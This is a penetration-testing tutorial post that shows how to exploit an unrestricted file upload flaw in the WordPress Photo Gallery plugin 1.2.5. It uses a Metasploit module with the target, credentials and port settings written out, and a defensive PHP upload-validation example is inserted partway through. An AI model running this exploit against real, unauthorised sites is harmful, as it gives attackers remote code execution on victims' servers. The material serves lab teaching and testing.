Channel: Penetration Testing Archives - Hacking Articles

Exploit Remote PC using WordPress Photo Gallery Unrestricted File Upload


The Photo Gallery Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. The flaw exists because the photo-gallery\photo-gallery.php script allows access to filemanager\UploadHandler.php, and the post() method in UploadHandler.php does not properly verify or sanitize user-uploaded files.
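For comparison, this is the kind of verification an image upload handler needs before it stores a file. It is an added example, not the plugin's code or its fix; the function name store_uploaded_image, the allowed-type list and the destination directory are assumptions made for illustration.

```php
<?php
// Added example: hypothetical validator, not the Photo Gallery plugin's code.
// Maps the content types we accept to the extension the server will assign.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate one entry of $_FILES and move it into $destDir.
 * Returns the stored path; throws RuntimeException when the file is rejected.
 */
function store_uploaded_image(array $file, string $destDir): string
{
    // Accept only files that PHP itself received through an HTTP upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed or not an HTTP upload');
    }

    // Decide the type from the file's bytes, never from the client-supplied
    // file name or Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime === false || !isset(ALLOWED_IMAGE_TYPES[$mime])) {
        throw new RuntimeException('rejected content type');
    }

    // The bytes must also parse as an image with real dimensions.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a parseable image');
    }

    // Server-chosen random name and extension: the client never controls
    // the stored name, so it cannot pick .php or a traversal path.
    $name   = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    $target = rtrim($destDir, '/\\') . DIRECTORY_SEPARATOR . $name;

    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store upload');
    }
    chmod($target, 0644); // readable, never executable
    return $target;
}
```

A file that is a valid image can still carry PHP in its trailing bytes, so the web server should also be configured not to execute scripts from the upload directory.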

Exploit Targets

Photo Gallery Plugin, version 1.2.5.

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open a Kali terminal and type msfconsole

Now type use exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload

msf exploit (wp_photo_gallery_unrestricted_file_upload)>set targeturi /wordpress

msf exploit (wp_photo_gallery_unrestricted_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_photo_gallery_unrestricted_file_upload)>set username admin

msf exploit (wp_photo_gallery_unrestricted_file_upload)>set password admin123

msf exploit (wp_photo_gallery_unrestricted_file_upload)>set rport 80

msf exploit (wp_photo_gallery_unrestricted_file_upload)>exploit

The post Exploit Remote PC using WordPress Photo Gallery Unrestricted File Upload appeared first on Hacking Articles.

